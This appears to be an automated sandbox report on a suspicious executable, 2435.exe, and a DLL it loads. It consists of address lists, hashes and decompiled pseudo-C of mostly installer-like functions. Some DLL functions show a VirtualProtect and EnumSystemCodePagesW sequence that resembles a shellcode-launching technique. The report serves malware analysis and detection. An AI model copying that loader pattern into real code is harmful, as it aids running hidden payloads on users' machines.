0x00406680
0x00406680
0x00406683
0x00406686
0x004066fa
0x004066fa
0x004066fa
0x00000000
0x004066fa
0x00406688
0x0040668e
0x00406691
0x00406694
0x00406697
0x0040669a
0x0040669d
0x004066a0
0x004066a3
0x004066a6
0x004066a9
0x004066c2
0x004066c4
0x004066c7
0x004066c8
0x004066cb
0x004066cd
0x004066d0
0x004066d2
0x004066d4
0x004066d7
0x004066d9
0x004066dc
0x004066e0
0x004066e2
0x004066e2
0x004066e3
0x004066e6
0x004066e9
0x004066ab
0x004066ab
0x004066b3
0x004066b8
0x004066ba
0x004066bd
0x004066bd
0x004066ec
0x004066f3
0x0040667d
0x0040667d
0x0040667d
0x0040667d
0x00000000
0x004066f5
0x00000000
0x004066f5
0x004066f3
0x00406606
0x00406609
0x0040660b
0x0040660e
0x00406611
0x00406614
0x00406616
0x00406619
0x0040661c
0x0040661c
0x0040661f
0x0040661f
0x00406622
0x00406629
0x004065fd
0x004065fd
0x004065fd
0x004065fd
0x00000000
0x0040662b
0x00000000
0x0040662b
0x00406629
0x004065af
0x004065b2
0x004065b4
0x004065b7
0x00000000
0x00000000
0x00406316
0x00406316
0x0040631a
0x0040695f
0x00000000
0x0040695f
0x00406320
0x00406323
0x00406326
0x00406329
0x0040632c
0x0040632f
0x00406332
0x00406334
0x00406337
0x0040633a
0x0040633d
0x0040633f
0x0040633f
0x0040633f
0x00000000
0x00000000
0x004064a1
0x004064a1
0x004064a5
0x0040696b
0x00000000
0x0040696b
0x004064ab
0x004064ae
0x004064b1
0x004064b4
0x004064b6
0x004064b6
0x004064b6
0x004064b9
0x004064bc
0x004064bf
0x004064c2
0x004064c5
0x004064c8
0x004064c9
0x004064cb
0x004064cb
0x004064cb
0x004064ce
0x004064d1
0x004064d4
0x004064d7
0x004064d7
0x004064d7
0x004064da
0x004064dc
0x004064dc
0x00000000
0x00000000
0x0040671e
0x0040671e
0x0040671e
0x00406722
0x00000000
0x00000000
0x00406728
0x0040672b
0x0040672e
0x00406731
0x00406733
0x00406733
0x00406733
0x00406736
0x00406739
0x0040673c
0x0040673f
0x00406742
0x00406745
0x00406746
0x00406748
0x00406748
0x00406748
0x0040674b
0x0040674e
0x00406751
0x00406754
0x00406757
0x0040675b
0x0040675d
0x00406760
0x00000000
0x00406762
0x004064df
0x004064df
0x00000000
0x004064df
0x00406760
0x00406995
0x00000000
0x00000000
0x00405fc4
0x004069cc
0x004069cc
0x00000000
0x004069cc
0x00406819
0x004067a0
0x0040679d

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c10b0ec6d8a1716373c4594016b158d4b4e2bf5790cbb1f15a9d43b973b4a336
Instruction ID: fa01dbb36adddbb747bc37ce8d7c8691094d52a97b4972d7f98645f49a39bfe1
Opcode Fuzzy Hash: c10b0ec6d8a1716373c4594016b158d4b4e2bf5790cbb1f15a9d43b973b4a336
Instruction Fuzzy Hash: B3715671D00229CBEF28CF98C844BADBBB1FF44305F11816AD856BB281C7795A56DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x423ed0;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42368c =  *0x42368c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42368c, 0x7530,  *0x423674), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32 ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
Instruction ID: b71ad761f0ea07ecc4e6183a90c0cd8288537aab3e92bb5761005deb6e4a9b1f
Opcode Fuzzy Hash: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
Instruction Fuzzy Hash: 20014431B24210ABE7291B388D08B2A32ADE714315F10423FF801F32F0D678DC028B4C

Uniqueness

Uniqueness Score: -1.00%

Function 0040583D, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040583D(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405841
0x0040584e
0x00405863
0x00405869

APIs

GetFileAttributesA.KERNELBASE(00000003,00402CB5,C:\Users\user\Desktop\2435.exe,80000000,00000003), ref: 00405841
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405863

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16

Uniqueness

Uniqueness Score: -1.00%

Function 0040581E, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040581E(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}

0x00405822
0x0040582b
0x00000000
0x00405834
0x0040583a

APIs

GetFileAttributesA.KERNELBASE(?,00405629,?,?,?), ref: 00405822
SetFileAttributesA.KERNEL32(?,00000000), ref: 00405834

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
Instruction ID: 89544605ef234ac14ed66c3b065a2d642d1346908a696065e0ba681aeed38476
Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
Instruction Fuzzy Hash: F8C04CB1808501ABD7056B24EF0D81F7B66EF50325B108B35F5A9E00F0C7355C66DA1A

Uniqueness

Uniqueness Score: -1.00%

Function 73352A38, Relevance: 1.6, APIs: 1, Instructions: 143
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E73352A38(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t28;
				void* _t29;
				int _t33;
				void* _t37;
				void* _t40;
				void* _t45;
				void* _t49;
				signed int _t56;
				void* _t61;
				void* _t70;
				intOrPtr _t72;
				signed int _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t81;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				intOrPtr _t93;
				intOrPtr _t94;

				if( *0x73354040 != 0 && E7335297D(_a4) == 0) {
					 *0x73354044 = _t93;
					if( *0x7335403c != 0) {
						_t93 =  *0x7335403c;
					} else {
						E73352F60(E73352977(), __ecx);
						 *0x7335403c = _t93;
					}
				}
				_t28 = E733529AB(_a4);
				_t94 = _t93 + 4;
				if(_t28 <= 0) {
					L9:
					_t29 = E7335299F();
					_t72 = _a4;
					_t79 =  *0x73354048;
					 *((intOrPtr*)(_t29 + _t72)) = _t79;
					 *0x73354048 = _t72;
					E73352999();
					_t33 = EnumSystemCodePagesW(??, ??); // executed
					 *0x7335401c = _t33;
					 *0x73354020 = _t79;
					if( *0x73354040 != 0 && E7335297D( *0x73354048) == 0) {
						 *0x7335403c = _t94;
						_t94 =  *0x73354044;
					}
					_t80 =  *0x73354048;
					_a4 = _t80;
					 *0x73354048 =  *((intOrPtr*)(E7335299F() + _t80));
					_t37 = E7335298B(_t80);
					_pop(_t81);
					if(_t37 != 0) {
						_t40 = E733529AB(_t81);
						if(_t40 > 0) {
							_push(_t40);
							_push(E733529B6() + _a4 + _v8);
							_push(E733529C0());
							if( *0x73354040 <= 0 || E7335297D(_a4) != 0) {
								_pop(_t88);
								_pop(_t45);
								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
								if(__eflags == 0) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t89);
								_pop(_t49);
								 *0x7335403c =  *0x7335403c +  *(_t89 + _t49) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					_t107 =  *0x73354048;
					if( *0x73354048 == 0) {
						 *0x7335403c = 0;
					}
					E733529E4(_t107, _a4,  *0x7335401c,  *0x73354020);
					return _a4;
				}
				_push(E733529B6() + _a4);
				_t56 = E733529BC();
				_v8 = _t56;
				_t77 = _t28;
				_push(_t68 + _t56 * _t77);
				_t70 = E733529C8();
				_t87 = E733529C4();
				_t90 = E733529C0();
				_t61 = _t77;
				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
					_push( *((intOrPtr*)(_t70 + _t61)));
				}
				_push( *((intOrPtr*)(_t87 + _t61)));
				asm("loop 0xfffffff1");
				goto L9;
			}

0x73352a48
0x73352a59
0x73352a66
0x73352a7a
0x73352a68
0x73352a6d
0x73352a72
0x73352a72
0x73352a66
0x73352a83
0x73352a88
0x73352a8e
0x73352ad2
0x73352ad2
0x73352ad7
0x73352adc
0x73352ae2
0x73352ae4
0x73352aea
0x73352af7
0x73352af9
0x73352afe
0x73352b0b
0x73352b1e
0x73352b24
0x73352b2a
0x73352b2b
0x73352b31
0x73352b3d
0x73352b43
0x73352b4b
0x73352b4c
0x73352b4f
0x73352b5a
0x73352b5c
0x73352b68
0x73352b6e
0x73352b76
0x73352ba2
0x73352ba3
0x73352ba5
0x73352ba9
0x73352ba9
0x73352bb0
0x73352b86
0x73352b86
0x73352b87
0x73352b95
0x73352b9e
0x73352b9e
0x73352b76
0x73352b5a
0x73352bb2
0x73352bb9
0x73352bbb
0x73352bbb
0x73352bd4
0x73352be2
0x73352be2
0x73352a99
0x73352a9a
0x73352a9f
0x73352aa3
0x73352aa8
0x73352abc
0x73352abd
0x73352abe
0x73352ac0
0x73352ac5
0x73352ac7
0x73352ac7
0x73352aca
0x73352ad0
0x00000000

APIs

EnumSystemCodePagesW.KERNELBASE(00000000), ref: 73352AF7

Memory Dump Source

Source File: 00000000.00000002.237544307.0000000073351000.00000020.00020000.sdmp, Offset: 73350000, based on PE: true

Associated: 00000000.00000002.237538806.0000000073350000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237551256.0000000073353000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237556712.0000000073355000.00000002.00020000.sdmp Download File

Similarity

API ID: CodeEnumPagesSystem
String ID:
API String ID: 2369445336-0
Opcode ID: 62e5e075e636de82fb0aeeec10097750b20ec6f6c9019e76fcf4597ac0682673
Instruction ID: c4d0f63158b6ad30237bffeeee987c915e60de8d99f4b3f9bd42ae3e46d60c8a
Opcode Fuzzy Hash: 62e5e075e636de82fb0aeeec10097750b20ec6f6c9019e76fcf4597ac0682673
Instruction Fuzzy Hash: 564129739042189FFB35AFB6E880F59BB79EB44324F344429F909D7240D73895928BA1

Uniqueness

Uniqueness Score: -1.00%

Function 004031BF, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004031BF(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}

0x004031c3
0x004031d6
0x004031de
0x00000000
0x004031e5
0x00000000
0x004031e7

APIs

ReadFile.KERNELBASE(00409130,00000000,00000000,00000000,00413040,0040B040,004030C4,00413040,00004000,?,00000000,?,00402F4E,00000004,00000000,00000000), ref: 004031D6

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
Instruction ID: 4c5c04567c480c11bae84e94003d2882b37cb3083c3cc1db03504fe221b835f3
Opcode Fuzzy Hash: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
Instruction Fuzzy Hash: DAE08631500119BBCF215E619C00A973B5CEB09362F008033FA04E9190D532DB109BA5

Uniqueness

Uniqueness Score: -1.00%

Function 73352921, Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x73354038 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x7335404c, 4, 0x40, 0x7335403c); // executed
					 *0x7335404c = 0xc2;
					 *0x7335403c = 0;
					 *0x73354044 = 0;
					 *0x73354058 = 0;
					 *0x73354048 = 0;
					 *0x73354040 = 0;
					 *0x73354050 = 0;
					 *0x7335404e = 0;
				}
				return 1;
			}

0x7335292a
0x7335292f
0x7335293f
0x73352947
0x7335294e
0x73352953
0x73352958
0x7335295d
0x73352962
0x73352967
0x7335296c
0x7335296c
0x73352974

APIs

VirtualProtect.KERNELBASE(7335404C,00000004,00000040,7335403C), ref: 7335293F

Memory Dump Source

Source File: 00000000.00000002.237544307.0000000073351000.00000020.00020000.sdmp, Offset: 73350000, based on PE: true

Associated: 00000000.00000002.237538806.0000000073350000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237551256.0000000073353000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237556712.0000000073355000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 6a13506407cf5c534f9a4a020d04387443033036752a4eae4b2df365f2cf6fee
Instruction ID: 19dc5235eb5cde07877bda3d5a82fe4d32e44af119e10951f68b2baed9736484
Opcode Fuzzy Hash: 6a13506407cf5c534f9a4a020d04387443033036752a4eae4b2df365f2cf6fee
Instruction Fuzzy Hash: 4CF092B35083A0DEE378EF7AA844B06BEF8B319264B31452AE59DD7241E33C40448B11

Uniqueness

Uniqueness Score: -1.00%

Function 004031F1, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004031F1(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}

0x004031ff
0x00403205

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E9D,?), ref: 004031FF

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
Instruction ID: eafd0aff1283cdec3023edec91852d87283cefa69c9b21bce59c6677f93a42a7
Opcode Fuzzy Hash: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
Instruction Fuzzy Hash: 14B01271644200BFDB214F00DF06F057B21A790701F108030B344380F082712420EB1E

Uniqueness

Uniqueness Score: -1.00%

Function 7335101B, Relevance: 1.3, APIs: 1, Instructions: 13
memoryCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E7335101B(signed int _a4) {
				signed int _t2;
				void* _t4;

				_t2 = E733514BB();
				if(_t2 != 0) {
					_t4 = GlobalAlloc(0x40, _t2 * _a4); // executed
					_push(_t4);
				} else {
					_push(_t2);
				}
				return E733514E2();
			}

0x7335101b
0x73351022
0x7335102f
0x73351035
0x73351024
0x73351024
0x73351024
0x7335103c

APIs

GlobalAlloc.KERNELBASE(00000040,?,73351019,00000001), ref: 7335102F

Memory Dump Source

Source File: 00000000.00000002.237544307.0000000073351000.00000020.00020000.sdmp, Offset: 73350000, based on PE: true

Associated: 00000000.00000002.237538806.0000000073350000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237551256.0000000073353000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237556712.0000000073355000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: ccd435f54f558cede7f90033bcdba779085d8c0c2c60d82b518482a9609748c5
Instruction ID: 7a863bc1d53be8e8efa140be4cca1ce06ffd15cb91c25e7697ae0286fcb6c154
Opcode Fuzzy Hash: ccd435f54f558cede7f90033bcdba779085d8c0c2c60d82b518482a9609748c5
Instruction Fuzzy Hash: 26C04CE3D05341BBEE35A6B68D45F2B66BC9B48662F209505F647D70C0DA2CC5415631

Uniqueness

Uniqueness Score: -1.00%

Function 00405684, Relevance: 1.3, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405684(CHAR* _a4, intOrPtr _a8) {
				CHAR* _t3;
				char _t4;

				_t3 = _a4;
				while(1) {
					_t4 =  *_t3;
					if(_t4 == 0) {
						break;
					}
					if(_t4 != _a8) {
						_t3 = CharNextA(_t3); // executed
						continue;
					}
					break;
				}
				return _t3;
			}

0x00405684
0x00405697
0x00405697
0x0040569b
0x00000000
0x00000000
0x0040568e
0x00405691
0x00000000
0x00405691
0x00000000
0x0040568e
0x0040569d

APIs

CharNextA.USER32(?,004032E7,"C:\Users\user\Desktop\2435.exe" ,00000020), ref: 00405691

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: 10cd4d19b72e12b0d646a530e1cb92258a05f85d45f981c2b986421ba67828a8
Instruction ID: 4b50f4be006ed93e5fecb5877ccbcb73a57f8e59dcdb15c27e94a023760cf747
Opcode Fuzzy Hash: 10cd4d19b72e12b0d646a530e1cb92258a05f85d45f981c2b986421ba67828a8
Instruction Fuzzy Hash: A9C0802440C64057C610475045248777FF4EA92340F948CA7F8CC63150C23A68408F3A

Uniqueness

Uniqueness Score: -1.00%

Function 73351215, Relevance: 1.3, APIs: 1, Instructions: 4
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E73351215() {
				void* _t1;

				_t1 = GlobalAlloc(0x40,  *0x7335405c); // executed
				return _t1;
			}

0x7335121d
0x73351223

APIs

GlobalAlloc.KERNELBASE(00000040,73351233,?,733512CF,-7335404B,733511AB,-000000A0), ref: 7335121D

Memory Dump Source

Source File: 00000000.00000002.237544307.0000000073351000.00000020.00020000.sdmp, Offset: 73350000, based on PE: true

Associated: 00000000.00000002.237538806.0000000073350000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237551256.0000000073353000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.237556712.0000000073355000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 9e5749eb452f8e17af3d479c416817fe0bf8a3c2255df056563089ffb22a62c4
Instruction ID: 6a065e89b072235e265fddb8625acde5ea899a7551ea71a2f2e4fda2a34bc76f
Opcode Fuzzy Hash: 9e5749eb452f8e17af3d479c416817fe0bf8a3c2255df056563089ffb22a62c4
Instruction Fuzzy Hash: C9A001B3949210DAEE65AAF2C90AB547A29A748721F308040E35A56194C66E40109B25

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00405042, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00405042(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				int _t94;
				int _t95;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423684;
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404FD6, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b || _a12 != _t154) {
								goto L20;
							} else {
								_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
								_a8 = _t87;
								if(_t87 <= _t149) {
									L37:
									return 0;
								}
								_t160 = CreatePopupMenu();
								AppendMenuA(_t160, _t149, 1, E00405B88(_t149, _t154, _t160, _t149, 0xffffffe1));
								_t92 = _a16;
								if(_t92 != 0xffffffff) {
									_t150 = _t92;
									_t94 = _t92 >> 0x10;
								} else {
									GetWindowRect(_t154,  &_v28);
									_t150 = _v28.left;
									_t94 = _v28.top;
								}
								_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
								_t162 = 1;
								if(_t95 == 1) {
									_v60 = _t149;
									_v48 = 0x4204a0;
									_v44 = 0xfff;
									_a4 = _a8;
									do {
										_a4 = _a4 - 1;
										_t162 = _t162 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
									} while (_a4 != _t149);
									OpenClipboard(_t149);
									EmptyClipboard();
									_t101 = GlobalAlloc(0x42, _t162);
									_a4 = _t101;
									_t163 = GlobalLock(_t101);
									do {
										_v48 = _t163;
										_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
										 *_t164 = 0xa0d;
										_t163 = _t164 + 2;
										_t149 = _t149 + 1;
									} while (_t149 < _a8);
									GlobalUnlock(_a4);
									SetClipboardData(1, _a4);
									CloseClipboard();
								}
								goto L37;
							}
						}
						if( *0x42366c == _t149) {
							ShowWindow( *0x423ea8, 8);
							if( *0x423f2c == _t149) {
								E00404F04( *((intOrPtr*)( *0x41fc70 + 0x34)), _t149);
							}
							E00403EF1(1);
							goto L25;
						}
						 *0x41f868 = 2;
						E00403EF1(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00403F7F(_a8, _a12, _a16);
						}
						ShowWindow( *0x423670, _t149);
						ShowWindow(_t154, 8);
						E00403F4D(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423eb0;
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423670 = GetDlgItem(_a4, 0x403);
				 *0x423668 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423684 = _t127;
				_v8 = _t127;
				E00403F4D( *0x423670);
				 *0x423674 = E004047A6(4);
				 *0x42368c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403F18(_a4);
				if(( *0x423eb8 & 0x00000003) != 0) {
					ShowWindow( *0x423670, _t149);
					if(( *0x423eb8 & 0x00000002) != 0) {
						 *0x423670 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403F4D( *0x423668);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423eb8 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}

0x0040504b
0x00405051
0x0040505a
0x0040505d
0x004051f5
0x00405219
0x00405219
0x0040522c
0x0040524a
0x00405251
0x004052a8
0x004052ac
0x00000000
0x004052b3
0x004052bb
0x004052c3
0x004052c6
0x004053bf
0x00000000
0x004053bf
0x004052d5
0x004052e1
0x004052e7
0x004052ed
0x00405302
0x00405308
0x004052ef
0x004052f4
0x004052fa
0x004052fd
0x004052fd
0x00405318
0x00405320
0x00405323
0x0040532c
0x0040532f
0x00405336
0x0040533d
0x00405345
0x00405345
0x0040535c
0x0040535c
0x00405363
0x00405369
0x00405372
0x00405379
0x00405382
0x00405384
0x00405387
0x00405396
0x00405398
0x0040539e
